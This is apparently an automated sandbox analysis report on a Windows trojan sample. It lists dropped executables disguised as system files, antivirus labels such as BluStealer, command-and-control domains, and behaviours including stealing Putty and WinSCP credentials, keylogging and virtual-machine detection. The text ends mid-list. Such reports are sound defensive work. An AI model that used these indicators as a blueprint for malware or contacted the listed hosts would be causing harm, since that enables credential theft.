other signatures 29->149 36 spoolsv.exe 2 29->36         started        87 icanhazip.com 104.18.114.97, 49753, 80 CLOUDFLARENETUS United States 34->87 89 64.89.4.0.in-addr.arpa 34->89 143 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->143 145 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 34->145 147 May check the online IP address of the machine 34->147 151 2 other signatures 34->151 file13 signatures14 process15 file16 65 C:\Windows\System\svchost.exe, PE32 36->65 dropped 101 Antivirus detection for dropped file 36->101 103 Machine Learning detection for dropped file 36->103 105 Drops executables to the windows directory (C:\Windows) and starts them 36->105 107 2 other signatures 36->107 40 svchost.exe 3 4 36->40         started        signatures17 process18 file19 69 C:\Users\user\AppData\Local\stsys.exe, PE32 40->69 dropped 123 Antivirus detection for dropped file 40->123 125 Detected CryptOne packer 40->125 127 Machine Learning detection for dropped file 40->127 129 3 other signatures 40->129 44 spoolsv.exe 40->44         started        47 at.exe 40->47         started        49 at.exe 40->49         started        51 17 other processes 40->51 signatures20 process21 signatures22 135 Installs a global keyboard hook 44->135 53 conhost.exe 47->53         started        55 conhost.exe 49->55         started        57 conhost.exe 51->57         started        59 conhost.exe 51->59         started        61 conhost.exe 51->61         started        63 13 other processes 51->63 process23

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Lg3gn9y1Cj.exe87%VirustotalBrowse
                Lg3gn9y1Cj.exe100%ReversingLabsWin32.Trojan.Swisyn
                Lg3gn9y1Cj.exe100%AviraTR/Patched.Ren.Gen
                Lg3gn9y1Cj.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\icsys.icn.exe100%AviraTR/Patched.Ren.Gen
                C:\Users\user\Desktop\lg3gn9y1cj.exe 100%AviraTR/Dropper.Gen
                C:\Windows\System\svchost.exe100%AviraTR/Patched.Ren.Gen
                C:\Windows\System\spoolsv.exe100%AviraTR/Patched.Ren.Gen
                C:\Users\user\AppData\Roaming\mrsys.exe100%AviraTR/Patched.Ren.Gen
                C:\Windows\System\explorer.exe100%AviraTR/Patched.Ren.Gen
                C:\Users\user\AppData\Local\stsys.exe100%AviraTR/Patched.Ren.Gen
                C:\Users\user\AppData\Local\icsys.icn.exe100%Joe Sandbox ML
                C:\Users\user\Desktop\lg3gn9y1cj.exe 100%Joe Sandbox ML
                C:\Windows\System\svchost.exe100%Joe Sandbox ML
                C:\Windows\System\spoolsv.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\mrsys.exe100%Joe Sandbox ML
                C:\Windows\System\explorer.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\stsys.exe100%Joe Sandbox ML
                C:\Users\user\Desktop\lg3gn9y1cj.exe 26%MetadefenderBrowse
                C:\Users\user\Desktop\lg3gn9y1cj.exe 92%ReversingLabsWin32.Infostealer.BluStealer

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                9.0.spoolsv.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                52.2.svchost.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                1.0.lg3gn9y1cj.exe .400000.0.unpack100%AviraTR/Dropper.GenDownload File
                9.2.spoolsv.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                1.2.lg3gn9y1cj.exe .400000.0.unpack100%AviraTR/Dropper.GenDownload File
                7.2.spoolsv.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                34.2.explorer.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                4.0.icsys.icn.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                4.2.icsys.icn.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                0.2.Lg3gn9y1Cj.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                52.0.svchost.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                5.2.explorer.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                5.0.explorer.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                8.2.svchost.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                0.0.Lg3gn9y1Cj.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                34.0.explorer.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                8.0.svchost.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                7.0.spoolsv.exe.400000.0.unpack100%AviraTR/Patched.Ren.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                zxq.net0%VirustotalBrowse
                vccmd01.zxq.net1%VirustotalBrowse
                64.89.4.0.in-addr.arpa0%VirustotalBrowse
                vccmd03.googlecode.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://vccmd03.googlecode.com/files/cmsys.gif0%URL Reputationsafe
                https://zxq.net/wp-content/uploads/2022/02/ZXQ-FB.png0%Avira URL Cloudsafe
                https://zxq.net/privacy-policy/0%Avira URL Cloudsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumb0%Avira URL Cloudsafe
                https://zxq.net/these-are-the-injured-you-may-suffer-in-a-bicycle-accident/0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-450x280.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-1024x637.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/02/ZXQ.png0%Avira URL Cloudsafe
                https://zxq.net/about-us/0%Avira URL Cloudsafe
                https://zxq.net/the-future-of-cryptocurrency-is-it-time-to-get-your-crypto-license-in-europe/0%Avira URL Cloudsafe
                https://zxq.net/cmsys.gif0%Avira URL Cloudsafe
                https://zxq.net/#logo0%Avira URL Cloudsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-760%Avira URL Cloudsafe
                https://zxq.net/news/technology/0%Avira URL Cloudsafe
                https://zxq.net/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.js?ver=7.1.10%Avira URL Cloudsafe
                https://zxq.net/wp-json/0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-768x432.jpeg0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-450x253.j0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-450x253.jpeg0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-300x187.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-768x478.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/How-To-.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=21060%Avira URL Cloudsafe
                http://crl.ver)0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/How-To--1024x609.png0%Avira URL Cloudsafe
                https://zxq.net/why-you-should-seek-an-uber-or-lyft-accident-lawyer/0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-450%Avira URL Cloudsafe
                https://zxq.net/reasons-to-hire-a-truck-accident-attorney/0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-300x169.jpeg0%Avira URL Cloudsafe
                https://%s.xboxlive.com0%URL Reputationsafe
                https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-150x84.jpeg0%Avira URL Cloudsafe
                https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=21060%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-150x93.png0%Avira URL Cloudsafe
                https://zxq.net/?s=0%Avira URL Cloudsafe
                https://zxq.net/how-to-find-an-investor-for-your-business/0%Avira URL Cloudsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/;0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/These-Are-The-Injured-You-May-Suffer-in-a-Bicycle-Acciden0%Avira URL Cloudsafe
                https://dynamic.t0%URL Reputationsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/#webpage0%Avira URL Cloudsafe
                https://zxq.net/news/entertainment/0%Avira URL Cloudsafe
                https://zxq.net/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black-300x117.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-150x84.jp0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/How-To--1200x714.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01.jpeg0%Avira URL Cloudsafe
                https://zxq.net/write-for-us/0%Avira URL Cloudsafe
                https://zxq.net/what-is-the-best-way-to-learn-golang/0%Avira URL Cloudsafe
                https://zxq.net/#organization0%Avira URL Cloudsafe
                https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.20%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black.png0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-1200x747.png0%Avira URL Cloudsafe
                https://zxq.net/news/business/0%Avira URL Cloudsafe
                http://icanhazip.com40%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-300x169.j0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/The-Future-of-Cryptocurrency-Is-it-Time-to-Get-Your-Crypt0%Avira URL Cloudsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/ne0%Avira URL Cloudsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/L0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-1024x576.jpeg0%Avira URL Cloudsafe
                https://zxq.net/xmlrpc.php?rsd0%Avira URL Cloudsafe
                https://zxq.net/online-shopping-tips-during-covid/0%Avira URL Cloudsafe
                https://zxq.net/news/0%Avira URL Cloudsafe
                https://zxq.net/?p=1870%Avira URL Cloudsafe
                https://zxq.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzxq.net%2Fwhat-happened-to-the-old-zxq-we0%Avira URL Cloudsafe
                https://zxq.net/wp-content/themes/smart-mag/style.css?ver=7.1.10%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/How-To--150x89.png0%Avira URL Cloudsafe
                https://zxq.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.20%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01.jpeg0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-150x84.jpeg0%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/How-To--768x457.png0%Avira URL Cloudsafe
                https://zxq.net/wp-includes/js/jquery/jquery.min.js?ver=3.6.00%Avira URL Cloudsafe
                https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-300%Avira URL Cloudsafe
                https://zxq.net/what-happened-to-the-old-zxq-website/n0%Avira URL Cloudsafe
                https://zxq.net/wp-json/wp/v2/pages/1870%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                zxq.net
                		51.81.194.202
                		truetrueunknown
                icanhazip.com
                		104.18.114.97
                		truefalse
                  		high
                  googlecode.l.googleusercontent.com
                  		142.250.145.82
                  		truefalse
                    		high
                    vccmd01.zxq.net
                    		51.81.194.202
                    		truetrueunknown
                    64.89.4.0.in-addr.arpa
                    		unknown
                    		unknownfalseunknown
                    vccmd03.googlecode.com
                    		unknown
                    		unknowntrueunknown
                    vccmd01.t35.com
                    		unknown
                    		unknowntrue
                      		unknown
                      vccmd01.googlecode.com
                      		unknown
                      		unknowntrue
                        		unknown
                        vccmd02.googlecode.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://vccmd03.googlecode.com/files/cmsys.giffalse
                          • URL Reputation: safe
                          		unknown
                          https://zxq.net/cmsys.giftrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://zxq.net/what-happened-to-the-old-zxq-website/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://icanhazip.com/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://zxq.net/wp-content/uploads/2022/02/ZXQ-FB.pngwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://zxq.net/privacy-policy/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/botlg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000000.260922909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, Lg3gn9y1Cj.exe, lg3gn9y1cj.exe .0.drfalse
                              		high
                              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000020.00000002.340646208.000001401B84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337917326.000001401B846000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumbwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://zxq.net/these-are-the-injured-you-may-suffer-in-a-bicycle-accident/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-450x280.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://zxq.net/wp-content/uploads/2022/07/What-is-the-Best-Way-to-Learn-Golang-1024x637.pngexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://zxq.net/wp-content/uploads/2022/02/ZXQ.pngwhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/LimerBoy/StormKittyAppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://zxq.net/about-us/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://zxq.net/the-future-of-cryptocurrency-is-it-time-to-get-your-crypto-license-in-europe/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://zxq.net/#logowhat-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://zxq.net/wp-content/uploads/2022/07/Why-You-Should-Seek-An-Uber-Or-Lyft-Accident-Lawyer-01-76explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://icanhazip.comAppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://zxq.net/news/technology/what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://zxq.net/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.js?ver=7.1.1explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000002.00000002.277628269.00000000072E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://zxq.net/wp-json/explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bingmapsportal.comsvchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-768x432.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://zxq.net/wp-content/uploads/2022/07/Best-Mothers-Day-Gifts-of-2022-for-Every-Mom-01-450x253.jexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000020.00000003.337977205.000001401B856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-450x253.jpegexplorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, 